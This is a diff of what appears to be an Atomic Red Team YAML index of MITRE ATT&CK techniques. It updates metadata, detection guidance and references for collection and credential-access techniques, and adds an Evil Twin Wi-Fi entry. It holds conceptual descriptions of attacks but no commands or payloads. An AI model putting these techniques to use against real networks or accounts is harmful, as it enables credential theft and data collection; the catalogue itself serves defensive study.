-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40377,9 +40862,6 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests:
     - name: Azure - Enumerate Azure Blobs with MicroBurst
@@ -40477,30 +40959,7 @@ collection:
         name: powershell
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40511,23 +40970,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40597,7 +41080,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40632,7 +41114,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40651,10 +41133,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40683,7 +41244,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40713,8 +41274,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40768,7 +41327,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40805,7 +41363,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40833,12 +41391,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40875,23 +41431,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40924,21 +41480,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -41046,12 +41601,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -41062,13 +41616,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41082,6 +41636,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -41092,12 +41647,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -41142,30 +41697,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -41175,31 +41711,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -41232,10 +41785,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41244,16 +41799,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -41285,70 +41841,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -41421,7 +41973,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -41476,12 +42027,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41493,6 +42043,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -41500,11 +42053,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41521,14 +42074,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -41544,6 +42094,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41552,13 +42103,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41566,15 +42117,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
